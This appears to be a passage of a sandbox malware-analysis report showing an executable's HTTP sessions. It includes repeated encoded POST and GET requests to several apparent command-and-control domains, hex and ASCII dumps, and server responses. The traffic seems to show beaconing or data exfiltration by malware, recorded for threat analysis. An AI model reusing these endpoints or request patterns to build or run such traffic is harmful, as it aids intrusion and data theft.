                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2f 33 79 6d 58 72 5a 75 73 51 2f 74 78 65 6f 33 78 64 78 54 30 46 6d 69 38 33 41 64 63 73 6d 71 6b 64 71 67 41 4e 67 4a 79 6b 31 62 4d 45 76 55 59 41 46 49 46 4b 64 32 56 69 39 72 71 6c 42 32 76 53 54 72 63 7a 69 30 58 48 53 36 6e 63 35 6e 46 43 43 64 57 42 57 31 31 47 4a 6f 6f 68 36 57 75 4f 78 73 72 35 6f 36 56 30 7a 6b 54 4b 70 68 64 34 6e 4a 71 79 6f 4f 78 76 61 72 73 79 78 44 46 4d 51 68 4e 46 58 46 62 62 35 4b 43 34 50 6e 50 5a 72 6b 77 6d 35 41 32 41 46 76 46 72 45 36 69 72 71 68 4b 61 69 64 66 67 52 6a 6f 41 35 37 6e 4d 55 79 78 67 37 75 2b 47 35 74 46 34 71 75 43 74 62 78 59 45 4f 61 30 52 6e 6a 6d 41 36 63 67 48 35 57 63 65 51 3d
                                                      Data Ascii: N0spilI0=/3ymXrZusQ/txeo3xdxT0Fmi83AdcsmqkdqgANgJyk1bMEvUYAFIFKd2Vi9rqlB2vSTrczi0XHS6nc5nFCCdWBW11GJooh6WuOxsr5o6V0zkTKphd4nJqyoOxvarsyxDFMQhNFXFbb5KC4PnPZrkwm5A2AFvFrE6irqhKaidfgRjoA57nMUyxg7u+G5tF4quCtbxYEOa0RnjmA6cgH5WceQ=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.44974023.224.27.17380600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:36:21.498716116 CEST10829OUTPOST /8z5k/ HTTP/1.1
                                                      Host: www.1183377.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.1183377.app
                                                      Referer: http://www.1183377.app/8z5k/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2f 33 79 6d 58 72 5a 75 73 51 2f 74 78 65 6f 33 78 64 78 54 30 46 6d 69 38 33 41 64 63 73 6d 71 6b 64 71 67 41 4e 67 4a 79 6b 39 62 4d 56 50 55 5a 68 46 49 47 4b 64 32 63 43 39 71 71 6c 41 6b 76 53 61 67 63 7a 75 43 58 42 4f 36 68 2b 42 6e 43 7a 43 64 42 52 57 31 71 32 4a 74 6d 42 37 63 75 4f 68 6f 72 35 34 36 56 30 7a 6b 54 4d 4e 68 62 70 6e 4a 6f 79 6f 42 35 50 61 2f 6f 79 78 76 46 4d 59 66 4e 46 62 7a 62 71 5a 4b 43 59 66 6e 4e 72 7a 6b 39 6d 35 65 36 67 46 33 46 72 41 4d 69 76 4b 58 4b 62 48 77 66 6e 5a 6a 6f 6c 51 6e 2f 59 55 65 72 67 57 30 39 31 42 38 4a 50 4b 51 44 75 66 46 4a 58 57 52 32 6a 33 4d 71 41 37 77 30 31 70 58 43 49 66 55 49 6a 43 4d 65 5a 53 51 37 77 79 44 78 7a 32 4f 69 55 4d 33 65 70 61 43 73 50 64 76 79 76 56 4a 4c 39 64 4a 61 4e 6b 49 47 76 37 47 42 6e 4b 48 37 6e 36 36 6d 6a 6b 78 39 6e 45 55 53 4d 76 6c 41 4a 69 62 44 63 47 4f 65 6c 35 6d 32 4c 68 49 53 30 51 52 65 4c 78 56 4b 61 65 67 70 6a 51 75 31 4b 58 57 31 2b 73 55 48 4d 65 34 74 63 42 64 59 [TRUNCATED]
                                                      Data Ascii: N0spilI0=/3ymXrZusQ/txeo3xdxT0Fmi83AdcsmqkdqgANgJyk9bMVPUZhFIGKd2cC9qqlAkvSagczuCXBO6h+BnCzCdBRW1q2JtmB7cuOhor546V0zkTMNhbpnJoyoB5Pa/oyxvFMYfNFbzbqZKCYfnNrzk9m5e6gF3FrAMivKXKbHwfnZjolQn/YUergW091B8JPKQDufFJXWR2j3MqA7w01pXCIfUIjCMeZSQ7wyDxz2OiUM3epaCsPdvyvVJL9dJaNkIGv7GBnKH7n66mjkx9nEUSMvlAJibDcGOel5m2LhIS0QReLxVKaegpjQu1KXW1+sUHMe4tcBdYsQ43Zf3c53EOT4Hg0CY7Ngdf4L8qLj6p49bF2e9jnMWAUt6e6oJfyI1iG5zBvCx1I2uDm5ebI1y7rufYgJdrPsEVWBqcGYxG1FNGOzA2bwr2mR8HYyyHheve36eE3Lknc3Kti1Pbr+B7M4AlZi191SUdHgfgGn+zJzcGlXIUfoIgZ4Aomnoniet2OWOKXWFxi1iiwZXakYmTwZH6WQPu2kK5MsfQGxaNPVjTLAYXcs53nnPqHg/GKOj/nQPo9q7jWd1PLcX6H3VDoBFZ3oxSb3KtABVbLGjnGm1uWRAb8Ub/L+gIWVjuowVICVXRlYtp2iI/ModcVJfRsgAHHU33na+k1iUZs8w+K3ZCfKZZpb+do6QNbYpl3CQF6//biA99Z+srkCYkJjty1gSeCC5Db/RBV+FBVJedGl+wmesJruR1S8dCIownGFDK2PVVLU5M2cAi7A6Dy5OzYTJi/i9nGJIB7cLaVVTv7OF2LT2uXcLGyofeFg/+1crDR4+q+mBfJpPdV81UEf98K8t9CAPiOk3LsX36TMXF+NBC3uk8pvLE/tgB3mnFXA+KeEp8y/8RGmaeJ4gsn3eIN2oxqfJpC8uNRyUjosIDaZOuMdcEoL9qLCM9amtjX5K0Ln2/XIQwoexfFI3NJdCMNqZcpUMMSz4iA1UbGiXDHn [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.44974123.224.27.17380600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:36:24.040805101 CEST469OUTGET /8z5k/?N0spilI0=y1aGUeBTtCWB8PYk9+ZY5neg5WJlbc6kuJGyOOgv6AsofEnOPQxTGp57UW4jl24PiU2QUCC/WnCbrv11FxPlfmqzqWQ0oAXUsuE4toY6QlP7A8hrX6vWgTw=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.1183377.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.44974252.187.43.7380600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:36:29.874146938 CEST721OUTPOST /4i87/ HTTP/1.1
                                                      Host: www.52ywq.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.52ywq.vip
                                                      Referer: http://www.52ywq.vip/4i87/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 67 56 64 41 4d 2f 57 70 30 7a 36 78 65 4f 61 38 76 37 46 34 51 75 31 71 73 5a 51 31 55 56 72 56 31 36 76 30 51 34 46 63 4c 55 54 66 53 58 33 49 30 46 79 42 78 6a 48 51 49 61 73 42 68 75 68 57 67 77 58 6a 6c 4f 2f 66 62 50 70 46 4f 46 79 31 32 5a 33 44 67 39 30 61 71 48 31 44 71 49 77 58 63 66 67 73 4d 33 50 5a 54 49 62 56 78 68 55 38 4b 44 45 6a 79 58 47 43 45 44 38 48 63 57 6d 6c 47 49 4d 73 4a 5a 69 54 57 77 6f 63 6a 49 4f 61 56 4d 48 66 6c 75 67 4d 37 58 4a 54 64 66 38 58 72 33 46 79 6d 47 5a 4d 6b 35 35 55 32 34 68 46 70 49 69 65 42 74 55 37 33 4c 75 66 48 7a 73 73 78 67 3d 3d
                                                      Data Ascii: N0spilI0=gVdAM/Wp0z6xeOa8v7F4Qu1qsZQ1UVrV16v0Q4FcLUTfSX3I0FyBxjHQIasBhuhWgwXjlO/fbPpFOFy12Z3Dg90aqH1DqIwXcfgsM3PZTIbVxhU8KDEjyXGCED8HcWmlGIMsJZiTWwocjIOaVMHflugM7XJTdf8Xr3FymGZMk55U24hFpIieBtU73LufHzssxg==
                                                      Sep 25, 2024 05:36:30.941747904 CEST359INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 25 Sep 2024 03:36:30 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://6329.vhjhbv.com/4i87/
                                                      Server: CDNRay
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.44974352.187.43.7380600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:36:32.435300112 CEST741OUTPOST /4i87/ HTTP/1.1
                                                      Host: www.52ywq.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.52ywq.vip
                                                      Referer: http://www.52ywq.vip/4i87/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 67 56 64 41 4d 2f 57 70 30 7a 36 78 59 76 4b 38 38 6f 74 34 62 75 31 72 78 70 51 31 61 31 72 52 31 36 7a 30 51 39 6b 52 4c 47 48 66 53 32 48 49 33 48 61 42 32 6a 48 51 44 36 73 45 76 4f 67 55 67 77 4c 52 6c 4c 48 66 62 4c 4a 46 4f 41 65 31 32 75 6a 45 68 74 31 38 6e 6e 31 64 33 59 77 58 63 66 67 73 4d 33 61 30 54 4c 72 56 79 55 63 38 4e 52 73 6b 74 6e 47 42 4e 6a 38 48 59 57 6d 35 47 49 4e 35 4a 62 57 70 57 32 73 63 6a 4b 47 61 56 5a 6e 41 77 65 67 4b 2f 58 49 52 52 73 52 6e 6d 30 6b 54 72 56 46 43 73 74 31 47 7a 2b 77 66 34 35 44 4a 54 74 77 49 71 4d 6e 72 4b 77 52 6c 71 73 4f 39 71 62 68 67 4f 67 53 39 2f 36 6a 4a 52 44 72 57 69 64 49 3d
                                                      Data Ascii: N0spilI0=gVdAM/Wp0z6xYvK88ot4bu1rxpQ1a1rR16z0Q9kRLGHfS2HI3HaB2jHQD6sEvOgUgwLRlLHfbLJFOAe12ujEht18nn1d3YwXcfgsM3a0TLrVyUc8NRsktnGBNj8HYWm5GIN5JbWpW2scjKGaVZnAwegK/XIRRsRnm0kTrVFCst1Gz+wf45DJTtwIqMnrKwRlqsO9qbhgOgS9/6jJRDrWidI=
                                                      Sep 25, 2024 05:36:33.484868050 CEST359INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 25 Sep 2024 03:36:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://6329.vhjhbv.com/4i87/
                                                      Server: CDNRay
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.44974452.187.43.7380600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:36:34.982815981 CEST10823OUTPOST /4i87/ HTTP/1.1
                                                      Host: www.52ywq.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.52ywq.vip
                                                      Referer: http://www.52ywq.vip/4i87/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 67 56 64 41 4d 2f 57 70 30 7a 36 78 59 76 4b 38 38 6f 74 34 62 75 31 72 78 70 51 31 61 31 72 52 31 36 7a 30 51 39 6b 52 4c 47 66 66 53 45 50 49 6c 67 47 42 33 6a 48 51 64 4b 73 46 76 4f 68 4d 67 77 44 56 6c 4c 44 68 62 4e 46 46 63 79 57 31 77 61 50 45 6f 74 31 38 34 33 31 63 71 49 77 6e 63 65 4d 6f 4d 30 69 30 54 4c 72 56 79 56 73 38 65 6a 45 6b 2b 33 47 43 45 44 38 62 63 57 6d 46 47 4a 6c 70 4a 62 54 65 57 47 4d 63 6a 71 57 61 5a 4b 50 41 73 4f 67 49 34 58 49 7a 52 73 64 34 6d 30 49 35 72 57 59 70 73 71 39 47 7a 36 73 41 6c 4d 6a 51 41 4d 6f 41 38 2b 6a 32 4f 51 4e 61 69 66 43 6b 71 4a 73 67 65 68 37 65 37 49 32 5a 46 78 6e 2b 2b 61 71 58 70 67 68 77 39 6c 4d 35 6b 70 58 78 6f 70 47 33 4c 49 4e 77 44 43 4e 63 4e 59 38 2f 56 39 62 2b 2b 34 51 69 6a 4d 2b 64 73 51 55 35 69 59 65 62 52 4d 6d 49 64 30 37 4f 37 63 34 53 58 41 67 6b 41 79 77 30 4a 50 48 61 67 37 50 50 31 79 37 4a 78 7a 67 36 6d 63 63 62 4d 53 54 72 6f 4a 48 53 30 54 54 65 32 79 4c 2b 62 6f 75 63 62 35 79 47 4e [TRUNCATED]
                                                      Data Ascii: N0spilI0=gVdAM/Wp0z6xYvK88ot4bu1rxpQ1a1rR16z0Q9kRLGffSEPIlgGB3jHQdKsFvOhMgwDVlLDhbNFFcyW1waPEot18431cqIwnceMoM0i0TLrVyVs8ejEk+3GCED8bcWmFGJlpJbTeWGMcjqWaZKPAsOgI4XIzRsd4m0I5rWYpsq9Gz6sAlMjQAMoA8+j2OQNaifCkqJsgeh7e7I2ZFxn++aqXpghw9lM5kpXxopG3LINwDCNcNY8/V9b++4QijM+dsQU5iYebRMmId07O7c4SXAgkAyw0JPHag7PP1y7Jxzg6mccbMSTroJHS0TTe2yL+boucb5yGNINZTsZqcX3aMrnwrCg4biUK2ENrPKHzXbx6on3yonotVAD7oopk3Aq32vHu/xF0qea0kFAangIxv7PxelW0y6Hh9oik0sw+CSHhEi/6YWziY9c0OJ/g8/F4OjsBzYksY3icRbRkzYOgeG6mFa+wSxCw+Nyt81ltQIgy8hf/bjiTItVrhFJNwcyhV5CGAMpgdMzT+TkCNICak6i8AsdaDpn3r6FfeyOsXlLmUz12THJOPZzOLPc3i77IWm/8TC2sjkcAtfU9mKWY7gMqY0Q8m5+L1w9WUveqGxx1GKEs0o2m66rskOAACq41OsoPHmrmRjwn2hlcnzfsOXsNL5adWM6G8B+/oD0pX844pe+DT7H6ELPWNCGaeiXr0JRvdOh0ecHg+txz+SSBKXLWGQG+ibkSFt0CFcDmYg5zLy9GP5oAOJLY/Y51HHHs9lHcJhOWFo7+aUW2WPXwIuXyOWaspsfcMPtYgm+p7Qg3Vqlzr/lfuZe6IUVR6MDj4XwqOMg9BqArRt7P+nqYp44SlxE5iqqWlU4eVZCbi75Q9/dHZQo6gFtKZFu3Yhov5VUTFxTaHBKu+prAM5AouECf25bj97IyL9mSbqtMu2pnxBywWrAZufURcqZmSCaIcfXTuxpR0y3i77wjPhy5VxOwSUJrwcVv5o5nwYFKwp1 [TRUNCATED]
                                                      Sep 25, 2024 05:36:36.056647062 CEST359INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 25 Sep 2024 03:36:35 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://6329.vhjhbv.com/4i87/
                                                      Server: CDNRay
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.44974552.187.43.7380600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:36:37.526915073 CEST467OUTGET /4i87/?Vvn=XtJLE6KXyHJ010P&N0spilI0=tX1gPPm4vGDAfdGczrVeX+gm8LhLY0HdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVsboGl1wez7JIRLBvFWiGcrLzlWcfeTA45w8= HTTP/1.1
                                                      Host: www.52ywq.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:36:38.622203112 CEST509INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 25 Sep 2024 03:36:38 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://6329.vhjhbv.com/4i87/?Vvn=XtJLE6KXyHJ010P&N0spilI0=tX1gPPm4vGDAfdGczrVeX+gm8LhLY0HdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVsboGl1wez7JIRLBvFWiGcrLzlWcfeTA45w8=
                                                      Server: CDNRay
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.449746199.192.21.16980600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:36:43.845462084 CEST730OUTPOST /d8cw/ HTTP/1.1
                                                      Host: www.zenscape.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.zenscape.top
                                                      Referer: http://www.zenscape.top/d8cw/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2f 69 74 57 33 34 73 62 30 31 4c 6c 48 38 6c 67 47 31 42 6a 63 43 4a 2f 30 33 79 52 48 7a 37 49 37 47 45 6a 6b 4f 2f 32 2b 4b 4e 39 47 7a 68 71 31 41 64 6f 30 39 56 42 71 56 62 38 54 73 65 67 61 63 57 54 54 72 52 73 74 78 4f 6e 4d 6b 58 43 33 69 59 72 70 6c 71 4a 79 71 71 69 75 65 78 2b 6c 44 30 57 41 54 48 31 52 33 62 70 58 4a 39 57 58 50 64 6a 65 67 44 66 6e 4d 33 50 36 49 6e 48 41 45 43 6f 62 7a 68 70 55 73 48 6e 75 67 58 6b 54 50 49 36 7a 44 7a 52 50 2b 6a 64 68 46 2f 38 31 61 45 4e 78 38 41 37 4d 30 30 54 77 6f 61 33 79 54 2b 4d 77 54 4e 41 52 58 78 42 6e 7a 2f 48 6e 77 3d 3d
                                                      Data Ascii: N0spilI0=/itW34sb01LlH8lgG1BjcCJ/03yRHz7I7GEjkO/2+KN9Gzhq1Ado09VBqVb8TsegacWTTrRstxOnMkXC3iYrplqJyqqiuex+lD0WATH1R3bpXJ9WXPdjegDfnM3P6InHAECobzhpUsHnugXkTPI6zDzRP+jdhF/81aENx8A7M00Twoa3yT+MwTNARXxBnz/Hnw==
                                                      Sep 25, 2024 05:36:44.452625036 CEST980INHTTP/1.1 404 Not Found
                                                      Date: Wed, 25 Sep 2024 03:36:44 GMT
                                                      Server: Apache
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Length: 774
                                                      X-XSS-Protection: 1; mode=block
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.449747199.192.21.16980600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:36:46.388969898 CEST750OUTPOST /d8cw/ HTTP/1.1
                                                      Host: www.zenscape.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.zenscape.top
                                                      Referer: http://www.zenscape.top/d8cw/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2f 69 74 57 33 34 73 62 30 31 4c 6c 48 66 74 67 41 6d 35 6a 4c 79 4a 38 33 33 79 52 4e 54 37 45 37 47 49 6a 6b 4c 66 6d 72 6f 70 39 47 58 6c 71 6e 52 64 6f 33 39 56 42 6c 31 62 35 58 73 65 76 61 63 71 62 54 75 70 73 74 78 61 6e 4d 68 72 43 33 78 67 6f 6f 31 71 50 37 4b 71 67 78 75 78 2b 6c 44 30 57 41 54 53 51 52 33 7a 70 55 35 4e 57 57 75 64 73 43 77 44 63 33 73 33 50 78 6f 6e 44 41 45 43 65 62 32 46 44 55 75 76 6e 75 6c 7a 6b 64 2b 49 35 35 44 7a 66 46 65 69 6a 6b 48 66 79 30 6f 78 64 77 75 78 61 53 41 41 76 38 4f 4c 74 6a 69 66 62 69 54 70 7a 4d 51 34 31 71 77 43 4f 38 34 63 57 74 75 53 64 54 78 77 73 74 37 54 4b 65 73 57 37 46 39 34 3d
